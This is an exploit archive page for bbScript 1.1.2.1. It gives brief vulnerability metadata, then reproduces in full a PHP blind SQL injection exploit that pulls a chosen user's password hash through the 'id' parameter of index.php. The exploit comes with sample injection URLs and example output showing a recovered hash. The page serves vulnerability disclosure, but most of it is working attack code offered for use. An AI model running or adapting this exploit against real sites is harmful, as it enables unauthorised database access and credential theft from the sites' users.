bbScript - exploit.company

vendor:

bbScript

by:

cOndemned

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: bbScript

Affected Version From: 1.1.2.1

Affected Version To: 1.1.2.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit

bbScript <= 1.1.2.1 is vulnerable to Blind SQL Injection. This exploit is used to extract the password hash of a user from the database. The exploit uses a loop to iterate through the characters of the password hash and uses a substring function to extract the characters one by one. The exploit is written in PHP and can be used to target any vulnerable version of bbScript.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

<?php

/*

bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit
Bug found && exploited by cOndemned
Greetz: All friends, TWT, SecurityReason Team, Scruell ;*

Download: http://www.bbscript.com/download.php 
Note: You have to be logged into in order to download this script


/[bbScript_path]/index.php?action=showtopic&id=1+and+1=1--	TRUE	(normal)
/[bbScript_path]/index.php?action=showtopic&id=1+and+1=2--	FALSE	(error)


example:

condemned@agonia:~$ php bbscript-poc.php http://localhost/audits/bbScript admin

[~] bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit
[~] Bug found && exploited by cOndemned
[~] Target username set to admin
[~] Password Hash : 596a96cc7bf9108cd896f33c44aedc8a
[~] Done

*/

	
function concat($string)
{
	$length = strlen($string);
	$output = '';

	for($i = 0; $i < $length; $i++) $output .= sprintf("CHAR(%d),", ord($string[$i]));

	return 'CONCAT(' . substr($output, 0, -1) . ')';
}

echo "\n[~] bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit";
echo "\n[~] Bug found && exploited by cOndemned\n";

if($argc != 3)
{
	printf("[!] Usage: php %s <target> <login>\n\n", $argv[0]);
	exit;
}

list(, $target, $login) = $argv;

echo "[~] Target username set to $login\n";
	
$login = concat($login);
$chars = array_merge((array)$chars, range(48, 57), range(97, 102));
$pos   = 1;

echo "[~] Password Hash : ";

while($pos != 33)
{
	for($i = 0; $i <= 16; $i++)
	{
		$query  = "/index.php?action=showtopic&id=1+AND+SUBSTRING((SELECT+password+FROM+users+WHERE+username=$login),$pos,1)=CHAR({$chars[$i]})--";

		if(!preg_match('#Error#', file_get_contents($target . $query), $resp))
		{
			printf("%s", chr($chars[$i]));
			$pos++;
			break;
		}
	}
}

echo "\n[~] Done\n\n";

?>